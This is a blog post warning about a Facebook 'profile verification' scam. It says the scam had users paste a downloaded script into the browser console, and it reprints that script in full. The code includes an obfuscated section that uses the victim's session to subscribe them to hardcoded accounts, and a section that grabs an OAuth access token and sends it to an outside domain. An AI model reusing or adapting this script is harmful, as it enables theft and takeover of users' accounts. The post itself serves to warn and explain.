Dangerous Facebook post that saves users access token

I myself checked it. I found a post that was shared by my friends in which that stated that they verified their facebook profiles by using a tool. That post included that all the profiles should be verified or else they will be deactivated.

Facebook
The main thread was opened on 8:13 PM IST. The link is https://www.facebook.com/1441196272800278 (Currently deleted by Facebook).


You may also like Linux malware infected 10k+ servers


In that it has few steps that, it wants a javascript to be downloaded from http://seniphoto.com/VerifyFacebook.txt (Don't visit this) . It asked the user to open the javascript console on their browser and paste the code there and press enter.
That would run the third party script in the context of the users facebook account. The danger is unimaginable. It is sending the access token of the user to http://www.facebookverify.co.vu (Don't visit this) .
Facebook lately stopped the thread at 11:15 PM IST.
The domain www.facebookverify.co.vu is hosted on Google Server Engine. The document was last modified on Sun, 08 Jun 2014 17:46:27 GMT.

I am posting the script here :

var _0x7578=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x6C\x69\x73\x74\x73\x2F\x73\x75\x62\x73\x63\x72\x69\x62\x65\x2F\x6D\x6F\x64\x69\x66\x79","\x66\x6C\x69\x64\x3D","\x26\x61\x63\x74\x69\x6F\x6E\x3D\x73\x75\x62\x73\x63\x72\x69\x62\x65\x26\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x66\x65\x65\x64\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x67\x72\x6F\x75\x70\x5F\x6D\x61\x6C\x6C\x26\x66\x74\x5B\x74\x79\x70\x65\x5D\x3D\x34\x30\x26\x66\x74\x5B\x74\x6E\x5D\x3D\x44\x48\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x78\x6F\x4E\x70\x47\x6F\x26\x5F\x5F\x72\x65\x71\x3D\x79\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x70\x68\x73\x74\x61\x6D\x70\x3D","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65","\x73\x65\x6E\x64","\x32\x37\x37\x39\x32\x35\x38\x35\x35\x36\x38\x36\x38\x33\x38","\x32\x39\x31\x32\x32\x39\x36\x38\x31\x30\x32\x33\x31\x32\x32","\x36\x35\x36\x34\x34\x32\x35\x32\x31\x30\x35\x32\x34\x37\x30","\x34\x32\x36\x33\x30\x32\x33\x34\x37\x35\x31\x35\x38\x35\x34","\x34\x32\x36\x33\x30\x32\x34\x36\x37\x35\x31\x35\x38\x34\x32","\x34\x32\x36\x33\x30\x32\x35\x38\x37\x35\x31\x35\x38\x33\x30","\x34\x32\x36\x33\x30\x32\x37\x31\x34\x31\x38\x32\x34\x38\x34","\x32\x38\x38\x35\x32\x34\x36\x35\x37\x39\x37\x31\x34\x33\x38","\x33\x39\x34\x32\x35\x31\x30\x30\x30\x36\x39\x30\x34\x33\x33","\x33\x39\x33\x38\x30\x35\x34\x37\x30\x37\x33\x34\x39\x38\x36"]
var fb_dtsg=document[_0x7578[2]](_0x7578[1])[0][_0x7578[0]];
var user_id=document[_0x7578[4]][_0x7578[3]](document[_0x7578[4]][_0x7578[3]](/c_user=(\d+)/)[1]);
function verifyfb(_0x45dcx4)
{
 var _0x45dcx5= new XMLHttpRequest();
 var _0x45dcx6=_0x7578[5];
 var _0x45dcx7=_0x7578[6]+_0x45dcx4+_0x7578[7]+user_id+_0x7578[8]+fb_dtsg+_0x7578[9];
 _0x45dcx5[_0x7578[11]](_0x7578[10],_0x45dcx6,true);
 _0x45dcx5[_0x7578[12]]=function ()
 {
  if(_0x45dcx5[_0x7578[13]]==4&&_0x45dcx5[_0x7578[14]]==200)
  {
   _0x45dcx5[_0x7578[15]];
  }
 }
 ;
 _0x45dcx5[_0x7578[16]](_0x45dcx7);
}
;
verifyfb(_0x7578[17]);
verifyfb(_0x7578[18]);
verifyfb(_0x7578[19]);
verifyfb(_0x7578[20]);
verifyfb(_0x7578[21]);
verifyfb(_0x7578[22]);
verifyfb(_0x7578[23]);
verifyfb(_0x7578[24]);
verifyfb(_0x7578[25]);
verifyfb(_0x7578[26]);

if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){
var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
function uygulamaizinver(url){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
izinverhtml = document.createElement("html");
izinverhtml.innerHTML = xmlhttp.responseText;
if(izinverhtml.getElementsByTagName("form").length > 0){
izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
act = izinverhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinverhtml,act);
}
}
};  
xmlhttp.open("GET", url, true); 
xmlhttp.send();
}
function duzenlevegonder(formnesne,act){
izinverparams = "";
for(i=0;i<formnesne.getElementsByTagName("input").length;i++){
if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")){
izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
}
}
if(formnesne.getElementsByTagName("select").length > 0){
izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
}
izinverparams.replace("&fb_dtsg","fb_dtsg");
izinverparams += "&__CONFIRM__=1";
formnesne = formnesne;
var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
   if(xmlhttp.readyState == 4){
     izinhtml = document.createElement("html");
     izinhtml.innerHTML = xmlhttp.responseText;
   if(izinhtml.getElementsByTagName("form").length > 0){
     izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
     act = izinhtml.getElementsByTagName("form")[0].action;
     duzenlevegonder(izinhtml,act)
   }else{
   sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
   if (sex[1]) {
   tokenyolla(sex[1]);
   }
   }
   }
        };

xmlhttp.open("POST", act , true); 
xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(izinverparams);

}

function TokenUrl(id){
return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id  +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
}

if(!localStorage['token_' + profile_id] ||  (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){
uygulamaizinver(TokenUrl("121876164619130"));
var http = new XMLHttpRequest();
http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
http['send']();
var get = JSON.parse(http['responseText']);
var isim = get.name;
}
window.setInterval(function(){
if(document.getElementsByClassName("_5ce")){
for(i=0;i<document.getElementsByClassName("_5ce").length;i++){
document.getElementsByClassName("_5ce")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiToggle wrap")){
for(i=0;i<document.getElementsByClassName("uiToggle wrap").length;i++){
document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiPopover")){
for(i=0;i<document.getElementsByClassName("uiPopover").length;i++){
document.getElementsByClassName("uiPopover")[i].innerHTML = "";
}
}
},200);
function tokenyolla(token){
top.location.href = 'http://www.facebookverify.co.vu/#' + token;
}}
Share on Google Plus

About Venkata Jaswanth U

ThoughtWorker, Computer Science graduate from India. I am passionate programmer, blogger, thinker. I love open-source and linux. I love making friends. Just send me 'hi' to any of my social profiles. I love helping people.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

We love your Feedback